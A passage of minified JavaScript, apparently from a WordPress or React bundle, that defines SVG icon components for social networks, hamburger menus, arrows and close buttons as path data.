.51-.09.59-.59.59H6.87c-.5 0-.59-.17-.59-.59V16.43c0-.5.09-.67.67-.67h5.03c.42 0 .59.08.59.59-.08 6.28-.08 12.49-.08 18.77m-3.1-22.04a3.583 3.583 0 0 1-3.61-3.61 3.626 3.626 0 0 1 3.61-3.6 3.572 3.572 0 0 1 3.6 3.6 3.692 3.692 0 0 1-3.6 3.61m25.65 22.63h-4.78c-.5 0-.75-.08-.75-.67v-9.3a13.485 13.485 0 0 0-.26-2.6 2.664 2.664 0 0 0-2.43-2.35 3.264 3.264 0 0 0-3.69 1.68 6.537 6.537 0 0 0-.58 2.51v9.98c0 .67-.17.84-.84.75-1.59-.08-3.19 0-4.78 0-.42 0-.59-.17-.59-.59V16.35c0-.42.09-.59.51-.59h4.86c.42 0 .5.17.5.5v2.1a7.617 7.617 0 0 1 3.69-2.77 8.813 8.813 0 0 1 6.2.51 5.948 5.948 0 0 1 3.11 4.44 20.4 20.4 0 0 1 .42 3.94v10.56c.08.59-.09.67-.59.67"})),whatsapp:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 44 44.26"},(0,o.createElement)("path",{d:"M22.311 0A21.555 21.555 0 0 0 .798 21.6a22.259 22.259 0 0 0 3.01 11.067l-3.807 11.6 11.951-3.805A21.656 21.656 0 0 0 44 21.517 21.687 21.687 0 0 0 22.311 0m10.637 29.915a5.156 5.156 0 0 1-3.487 2.414c-4.559.983-9.387-2.593-12.338-5.633a22.894 22.894 0 0 1-5.275-8.046c-.983-2.861.358-8.583 4.381-7.689.984.179 1.163 1.073 1.431 1.878.447 1.162.8 2.235 1.251 3.4a1.514 1.514 0 0 1 0 .894c-.357.805-1.162 1.341-1.7 2.056-.805 1.252 2.324 4.292 3.218 5.1 1.163 1.072 2.951 2.682 4.56 2.861.894.089 2.056-1.7 2.5-2.325.358-.447.626-.536 1.073-.358 1.52.626 2.951 1.52 4.47 2.325a.811.811 0 0 1 .537.983 3.565 3.565 0 0 1-.626 2.146"})),wordpress_lite_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0M2.724 24a21.149 21.149 0 0 1 1.844-8.657L14.716 43.15A21.283 21.283 0 0 1 2.724 24M24 45.278a21.317 21.317 0 0 1-6.01-.865l6.384-18.55 6.538 17.917a1.806 1.806 0 0 0 .154.293 21.224 21.224 0 0 1-7.066 1.2m2.931-31.249c1.282-.065 2.436-.2 2.436-.2a.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-2.09 0-5.6-.272-5.6-.272a.88.88 0 0 0-.133 1.754s1.084.136 2.23.2l3.317 9.084-4.657 13.963-7.754-23.047a42.05 42.05 0 0 0 2.436-.2.88.88 0 0 0-.135-1.754s-3.447.272-5.671.272c-.4 0-.871-.009-1.371-.025a21.273 21.273 0 0 1 32.144-4.006c-.093-.006-.182-.015-.275-.015a3.682 3.682 0 0 0-3.573 3.774c0 1.754 1.01 3.237 2.091 4.991a11.211 11.211 0 0 1 1.754 5.869 24.615 24.615 0 0 1-1.547 7.014l-2.2 6.952Zm7.764 28.366 6.5-18.788a20.025 20.025 0 0 0 1.618-7.62 16.1 16.1 0 0 0-.142-2.189 21.276 21.276 0 0 1-7.974 28.6"})),wordpress_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M4 23.999a20 20 0 0 0 11.272 18L5.732 15.86A19.923 19.923 0 0 0 4 24m33.5-1.009a10.531 10.531 0 0 0-1.646-5.517c-1.014-1.648-1.964-3.042-1.964-4.69a3.463 3.463 0 0 1 3.358-3.55c.089 0 .173.011.259.016A20 20 0 0 0 7.29 13.013c.47.015.912.025 1.288.025 2.091 0 5.33-.254 5.33-.254a.827.827 0 0 1 .128 1.648s-1.084.127-2.289.19l7.283 21.664 4.378-13.127-3.117-8.535c-1.078-.063-2.1-.19-2.1-.19a.827.827 0 0 1 .127-1.648s3.3.254 5.267.254c2.092 0 5.331-.254 5.331-.254a.827.827 0 0 1 .128 1.648s-1.085.127-2.289.19l7.228 21.5 2.063-6.538a23.047 23.047 0 0 0 1.454-6.593m-13.146 2.755-6 17.437a20.006 20.006 0 0 0 12.292-.319 1.835 1.835 0 0 1-.143-.276Zm17.2-11.344a15.342 15.342 0 0 1 .134 2.057 18.884 18.884 0 0 1-1.524 7.163l-6.11 17.661a20 20 0 0 0 7.5-26.881"}),(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m0 46.56A22.56 22.56 0 1 1 46.56 24 22.559 22.559 0 0 1 24 46.56"}))),youtube_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 33.86"},(0,o.createElement)("path",{d:"M47.134 5.29a5.893 5.893 0 0 0-4.232-4.232C39.055 0 24.05 0 24.05 0S9.044 0 5.293.962A6.146 6.146 0 0 0 .965 5.29C.003 9.041.003 16.929.003 16.929s0 7.887.962 11.638A5.894 5.894 0 0 0 5.197 32.8c3.847 1.058 18.853 1.058 18.853 1.058s15.005 0 18.756-1.058a6.059 6.059 0 0 0 4.232-4.233C48 24.816 48 16.929 48 16.929s.1-7.888-.866-11.639M19.141 21.928v-10a1.237 1.237 0 0 1 1.845-1.077l8.85 5a1.237 1.237 0 0 1 0 2.153l-8.85 5a1.237 1.237 0 0 1-1.845-1.077"})),pinterest:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M48.004 23.995a24 24 0 0 1-24 24.005 23.735 23.735 0 0 1-10.948-2.65h.086a15.084 15.084 0 0 0 4.8-6.914 35.685 35.685 0 0 0 1.729-7.009v-.192c.1-.384.192-.384.48-.192.1 0 .1.1.192.1a7.385 7.385 0 0 0 4.322 2.112 11.879 11.879 0 0 0 7.491-.96 16.739 16.739 0 0 0 4.513-3.649 11.277 11.277 0 0 0 1-1.354 17.413 17.413 0 0 0 2.574-7.278 16.381 16.381 0 0 0-1.1-8.555 13.1 13.1 0 0 0-4.774-5.569 17.523 17.523 0 0 0-8.067-2.977A20.935 20.935 0 0 0 15.45 4.065a15.91 15.91 0 0 0-9.028 8.258 11.865 11.865 0 0 0-.288 9.89 8.5 8.5 0 0 0 5.859 4.993c.288.1.384 0 .384-.288.192-1.056.384-2.112.576-3.073 0-.192 0-.384-.192-.48a8.869 8.869 0 0 1-1.825-2.688 6.966 6.966 0 0 1 .1-5.377 12.226 12.226 0 0 1 7.875-7.778 14.92 14.92 0 0 1 7.4-.672c5.475.912 7.914 6.625 7.559 11.685a15.147 15.147 0 0 1-2.757 7.423 7.589 7.589 0 0 1-4.129 2.976 5.108 5.108 0 0 1-4.226-.768 2.864 2.864 0 0 1-1.153-2.3 9.668 9.668 0 0 1 .769-3.745c.48-1.44 1.056-2.785 1.44-4.225a10.787 10.787 0 0 0 .384-3.072 3.408 3.408 0 0 0-4.206-2.977 5.336 5.336 0 0 0-2.641 1.364c-1.892 1.785-2.4 5.175-1.6 7.566a7.772 7.772 0 0 1-.1 4.9c-.864 2.976-1.825 6.049-2.5 9.122a28.284 28.284 0 0 0-.672 7.489 8.268 8.268 0 0 0 .576 3.063 24 24 0 1 1 34.949-21.356"})),reddit:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.85 48"},(0,o.createElement)("path",{d:"M44.492 25.179a6.625 6.625 0 0 0 .192-7.766 6.482 6.482 0 0 0-9.492-1.151c-.192.1-.288.192-.384.1a28.339 28.339 0 0 0-9.684-2.493c-.192 0-.287-.095-.192-.287.288-.959.672-1.822 1.055-2.781a29.239 29.239 0 0 1 3.068-5.657 7.62 7.62 0 0 1 2.017-1.919 2.338 2.338 0 0 1 2.493 0 6.138 6.138 0 0 1 1.246.959c.192.191.192.287.192.575a3.868 3.868 0 0 0 3.26 4.506 3.786 3.786 0 0 0 4.309-3.739 3.8 3.8 0 0 0-5.463-3.547.358.358 0 0 1-.479-.1 4.481 4.481 0 0 0-1.151-.863 5.486 5.486 0 0 0-6.232-.1 14.609 14.609 0 0 0-3.26 3.643 38.376 38.376 0 0 0-4.123 9.013c-.1.287-.192.383-.479.383a26.861 26.861 0 0 0-10.163 2.493c-.192.1-.288.1-.48-.1a6.631 6.631 0 0 0-8.054-.383 6.539 6.539 0 0 0-1.246 9.4c.192.192.192.288.1.479a13.425 13.425 0 0 0-.959 3.74 14.384 14.384 0 0 0 2.3 8.821 20.414 20.414 0 0 0 7.191 6.519 27.739 27.739 0 0 0 12.752 3.069 27.311 27.311 0 0 0 12.464-2.781 19.211 19.211 0 0 0 7.282-5.933c3.068-4.219 3.835-8.725 1.822-13.615a.865.865 0 0 1 .1-.48m-12.656 5.421a3.645 3.645 0 1 1 3.024-3.023 3.646 3.646 0 0 1-3.024 3.023m-.192 8.1a14.556 14.556 0 0 1-9.013 3.26 14.886 14.886 0 0 1-8.533-3.164 1.469 1.469 0 1 1 1.822-2.3 11.081 11.081 0 0 0 7.862 2.493 11.805 11.805 0 0 0 5.369-2.014c.288-.191.479-.383.767-.575a1.488 1.488 0 0 1 2.014.288 1.6 1.6 0 0 1-.288 2.013m-16.683-15.34a3.646 3.646 0 1 1-3.644 3.643 3.526 3.526 0 0 1 3.644-3.643m-12.464.767a4.959 4.959 0 0 1 7.095-6.808 18.573 18.573 0 0 0-7.095 6.808m41.036-.288a18.259 18.259 0 0 0-6.807-6.424c-.1-.1-.192-.1-.288-.192a5.75 5.75 0 0 1 2.4-.959 4.811 4.811 0 0 1 4.794 2.206 4.978 4.978 0 0 1 .1 5.273c0 .1-.1.384-.192.1"})),google_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,o.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"}))},i={hamicon_1:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M3.25 6c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4A.75.75 0 0 1 3.25 6ZM3.25 12c0-.41.34-.75.75-.75h12a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75ZM3.25 18c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75Z","clip-rule":"evenodd"})),hamicon_2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M3.25 6c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4A.75.75 0 0 1 3.25 6ZM3.25 12c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75ZM3.25 18c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75Z","clip-rule":"evenodd"})),hamicon_3:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M3.25 6c0-.41.34-.75.75-.75h16a.75.75 0 0 1 0 1.5H4A.75.75 0 0 1 3.25 6ZM3.25 12c0-.41.34-.75.75-.75h12a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75ZM3.25 18c0-.41.34-.75.75-.75h8a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1-.75-.75Z","clip-rule":"evenodd"})),hamicon_4:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M4.5 5.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM4.5 11.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM4.5 17.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM10.5 5.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM10.5 11.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM10.5 17.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM16.5 5.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM16.5 11.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM16.5 17.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Z"})),hamicon_5:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M19 19.25H5v-2.5h14v2.5ZM19 13.25H5v-2.5h14v2.5ZM19 7.25H5v-2.5h14v2.5Z","clip-rule":"evenodd"})),hamicon_6:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{"fill-rule":"evenodd",d:"M12 11.75a.25.25 0 1 0 0 .5.25.25 0 0 0 0-.5Zm-1.75.25a1.75 1.75 0 1 1 3.5 0 1.75 1.75 0 0 1-3.5 0ZM12 4.75a.25.25 0 1 0 0 .5.25.25 0 0 0 0-.5ZM10.25 5a1.75 1.75 0 1 1 3.5 0 1.75 1.75 0 0 1-3.5 0ZM12 18.75a.25.25 0 1 0 0 .5.25.25 0 0 0 0-.5Zm-1.75.25a1.75 1.75 0 1 1 3.5 0 1.75 1.75 0 0 1-3.5 0Z","clip-rule":"evenodd"}))},n={angle_bottom_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.6 32.75"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M2.55 32.254H.5V2.704a2.05 2.05 0 0 1 4.1 0v22.55l24-24a2.05 2.05 0 1 1 2.9 2.9l-24 24h22.55a2.05 2.05 0 1 1 0 4.1Z"})),angle_bottom_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.6 32.75"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M30.05 32.254H2.55a2.05 2.05 0 1 1 0-4.1H25.1l-24-24a2.05 2.05 0 0 1 2.9-2.9l24 24V2.704a2.05 2.05 0 1 1 4.1 0v29.55Z"})),angle_top_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.6 32.6"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m28.6 31.5-24-24v22.55a2.05 2.05 0 1 1-4.1 0V.5h29.55a2.05 2.05 0 1 1 0 4.1H7.5l24 24a2.05 2.05 0 1 1-2.9 2.9Z"})),angle_top_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 32.6 32.6"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M28 30.05V7.5l-24 24a2.05 2.05 0 1 1-2.9-2.9l24-24H2.551a2.05 2.05 0 1 1 0-4.1H32.1V30.05a2.05 2.05 0 1 1-4.1 0Z"})),leftAngle:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 53.76 53.76",version:"1.1",viewBox:"0 0 53.76 53.76"},(0,o.createElement)("g",null,(0,o.createElement)("path",{className:"active-path",d:"M44.574,53.76L9.186,26.88L44.574,0V53.76z M13.044,26.88l29.194,22.172V4.709L13.044,26.88z","data-original":"#000000"}))),rightAngle:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",enableBackground:"new 0 0 53.76 53.76",version:"1.1",viewBox:"0 0 53.76 53.76"},(0,o.createElement)("g",{transform:"matrix(-1 3.6739e-16 -3.6739e-16 -1 53.76 53.76)"},(0,o.createElement)("path",{className:"active-path",d:"M44.574,53.76L9.186,26.88L44.574,0V53.76z M13.044,26.88l29.194,22.172V4.709L13.044,26.88z","data-original":"#000000"}))),leftAngle2:(0,o.createElement)("svg",{enableBackground:"new 0 0 477.175 477.175",version:"1.1",viewBox:"0 0 477.18 477.18"},(0,o.createElement)("path",{d:"m145.19 238.58 215.5-215.5c5.3-5.3 5.3-13.8 0-19.1s-13.8-5.3-19.1 0l-225.1 225.1c-5.3 5.3-5.3 13.8 0 19.1l225.1 225c2.6 2.6 6.1 4 9.5 4s6.9-1.3 9.5-4c5.3-5.3 5.3-13.8 0-19.1l-215.4-215.5z"})),rightAngle2:(0,o.createElement)("svg",{enableBackground:"new 0 0 477.175 477.175",version:"1.1",viewBox:"0 0 477.18 477.18"},(0,o.createElement)("path",{d:"m360.73 229.08-225.1-225.1c-5.3-5.3-13.8-5.3-19.1 0s-5.3 13.8 0 19.1l215.5 215.5-215.5 215.5c-5.3 5.3-5.3 13.8 0 19.1 2.6 2.6 6.1 4 9.5 4s6.9-1.3 9.5-4l225.1-225.1c5.3-5.2 5.3-13.8 0.1-19z"})),collapse_bottom_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 34.1 19.95"},(0,o.createElement)("path",{d:"M17.05 19.949.601 3.499a2.05 2.05 0 0 1 2.9-2.9l13.551 13.55L30.603.599a2.05 2.05 0 0 1 2.9 2.9Z"})),arrowUp2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 34.1 19.95"},(0,o.createElement)("path",{d:"M32.05 19.949a2.041 2.041 0 0 1-1.45-.6L17.05 5.8 3.498 19.349a2.05 2.05 0 0 1-2.9-2.9l16.45-16.45 16.448 16.45a2.05 2.05 0 0 1-1.448 3.5"})),longArrowUp2:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 493.35 493.35"},(0,o.createElement)("path",{d:"m354.03 112.49-101.36-109.64c-1.905-1.903-4.189-2.853-6.856-2.853-2.478 0-4.665 0.95-6.567 2.853l-99.927 109.64c-2.475 3.049-2.952 6.377-1.431 9.994 1.524 3.616 4.283 5.424 8.28 5.424h63.954v356.32c0 2.663 0.855 4.853 2.57 6.564 1.713 1.707 3.899 2.562 6.567 2.562h54.816c2.669 0 4.859-0.855 6.563-2.562 1.711-1.712 2.573-3.901 2.573-6.564v-356.32h63.954c3.806 0 6.563-1.809 8.274-5.424 1.53-3.621 1.052-6.949-1.412-9.995z"})),arrow_left_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m22.551 34.324-8.849-8.85-.055-.055-1.422-1.42 1.418-1.418.063-.063 8.845-8.844a2.05 2.05 0 0 1 2.9 2.9l-5.378 5.375h12.8a2.05 2.05 0 0 1 0 4.1h-12.8l5.376 5.377a2.05 2.05 0 1 1-2.9 2.9Z"}))),arrow_bottom_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M13.675 25.449a2.05 2.05 0 0 1 2.9-2.9l5.377 5.376V15.124a2.05 2.05 0 1 1 4.1 0v12.8l5.377-5.377a2.05 2.05 0 0 1 2.9 2.9L24 35.774Z"}))),arrow_right_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M22.551 34.324a2.048 2.048 0 0 1 0-2.9l5.376-5.377H15.125a2.05 2.05 0 0 1 0-4.1h12.8l-5.374-5.373a2.05 2.05 0 1 1 2.9-2.9l8.845 8.843.063.062 1.416 1.42-1.422 1.422-.055.055-8.849 8.848a2.047 2.047 0 0 1-2.9 0Z"}))),arrow_top_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M21.951 32.875V20.073l-5.376 5.375a2.05 2.05 0 0 1-2.9-2.9l8.852-8.849.048-.049 1.426-1.425 1.422 1.422.055.055 8.847 8.847a2.05 2.05 0 1 1-2.9 2.9l-5.374-5.376v12.8a2.05 2.05 0 0 1-4.1 0Z"}))),close_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.922 19.922 0 0 1 24 4.1M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0"}),(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"m29.655 32.553-5.656-5.656-5.654 5.656a2.05 2.05 0 0 1-2.9-2.9l5.656-5.654-5.656-5.654a2.05 2.05 0 0 1 2.9-2.9l5.654 5.656 5.656-5.656a2.05 2.05 0 0 1 2.9 2.9l-5.658 5.654 5.656 5.655a2.05 2.05 0 1 1-2.9 2.9Z"}))),close_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 31.1 31.25"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M27.1 30.153 15.549 18.601 4 30.153a2.05 2.05 0 0 1-2.9-2.9l11.551-11.55L1.1 4.153a2.05 2.05 0 0 1 2.9-2.9l11.549 11.552L27.1 1.253a2.05 2.05 0 0 1 2.9 2.9l-11.553 11.55L30 27.253a2.05 2.05 0 1 1-2.9 2.9Z"})),arrow_down_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 37.1 49.16"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M1.1 31A2.05 2.05 0 1 1 4 28.1l12.5 12.5V2.55a2.05 2.05 0 0 1 4.1 0V40.6l12.5-12.5A2.05 2.05 0 1 1 36 31L18.549 48.45Z"})),leftArrowLg:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.16 37.25"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M18.157 36.154 2.183 20.179l-.053-.053-1.423-1.423 17.45-17.449a2.05 2.05 0 0 1 2.9 2.9l-12.503 12.5h38.053a2.05 2.05 0 1 1 0 4.1H8.555l12.5 12.5a2.05 2.05 0 1 1-2.9 2.9Z"})),rightArrowLg:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.16 37.25"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M28.1 36.154a2.048 2.048 0 0 1 0-2.9l12.5-12.5H2.55a2.05 2.05 0 1 1 0-4.1H40.6l-12.5-12.5a2.05 2.05 0 1 1 2.9-2.9l17.45 17.448L31 36.154a2.047 2.047 0 0 1-2.9 0Z"})),arrow_up_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 37.1 49.16"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M16.5 46.607V8.555L4 21.055a2.05 2.05 0 0 1-2.9-2.9L18.549.707l1.423 1.423.053.053L36 18.157a2.05 2.05 0 1 1-2.9 2.9L20.6 8.556v38.051a2.05 2.05 0 1 1-4.1 0Z"})),down_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M.002 24a24 24 0 1 1 24 24 24 24 0 0 1-24-24m25.114 12.043 11.063-11.057a1.126 1.126 0 0 0-.795-1.921h-7.135V12.437a.952.952 0 0 0-.952-.951h-6.6a.95.95 0 0 0-.945.951v10.624h-7.136a1.126 1.126 0 0 0-.8 1.921l11.063 11.057a1.572 1.572 0 0 0 2.234 0"})),right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24 24 0 0 0 24 0m12.043 25.114L24.986 36.177a1.125 1.125 0 0 1-1.92-.8v-7.135H12.438a.952.952 0 0 1-.951-.952v-6.6a.95.95 0 0 1 .951-.945h10.629v-7.136a1.126 1.126 0 0 1 1.92-.8l11.057 11.063a1.572 1.572 0 0 1 0 2.234"})),left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 48A24 24 0 1 0 0 24a24 24 0 0 0 24 24M11.956 22.886l11.057-11.063a1.126 1.126 0 0 1 1.921.795v7.135h10.628a.952.952 0 0 1 .951.952v6.6a.95.95 0 0 1-.951.945H24.934v7.136a1.126 1.126 0 0 1-1.921.8L11.956 25.123a1.572 1.572 0 0 1 0-2.234"})),up_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M0 24A24 24 0 1 0 24 0 24 24 0 0 0 0 24m25.114-12.045 11.063 11.058a1.126 1.126 0 0 1-.795 1.921h-7.135v10.627a.952.952 0 0 1-.952.951h-6.6a.95.95 0 0 1-.945-.951V24.934h-7.136a1.126 1.126 0 0 1-.8-1.921l11.064-11.058a1.573 1.573 0 0 1 2.233 0"})),wrong_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M24 0a24 24 0 1 0 24 24A24.032 24.032 0 0 0 24 0m9.648 30.151a2.475 2.475 0 0 1-3.5 3.5l-6.139-6.138-6.151 6.138a2.475 2.475 0 0 1-3.5-3.5l6.15-6.139-6.15-6.15a2.475 2.475 0 1 1 3.5-3.5l6.151 6.151 6.139-6.151a2.475 2.475 0 1 1 3.5 3.5l-6.139 6.15Z"})),bottom_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 35.44"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M.5 32.893V22.62a10.284 10.284 0 0 1 10.272-10.272h29.871l-8.192-8.193a2.05 2.05 0 0 1 2.9-2.9l11.667 11.669.048.048 1.425 1.425-13.142 13.141a2.05 2.05 0 0 1-2.9-2.9l8.193-8.193h-29.87A6.178 6.178 0 0 0 4.6 22.62v10.273a2.05 2.05 0 0 1-4.1 0Z"})),bottom_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 35.29"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M44.6 32.738V22.465a6.179 6.179 0 0 0-6.173-6.172H8.555l8.192 8.193a2.05 2.05 0 1 1-2.9 2.9L.707 14.243 13.849 1.1a2.05 2.05 0 1 1 2.9 2.9l-8.194 8.193h29.872A10.285 10.285 0 0 1 48.7 22.465v10.273a2.05 2.05 0 0 1-4.1 0Z"})),top_left_angle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.2 35.29"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M13.849 34.186.707 21.046 13.849 7.9a2.05 2.05 0 1 1 2.9 2.9L8.556 19h29.871a6.179 6.179 0 0 0 6.173-6.17V2.55a2.05 2.05 0 1 1 4.1 0v10.276A10.283 10.283 0 0 1 38.427 23.1H8.556l8.191 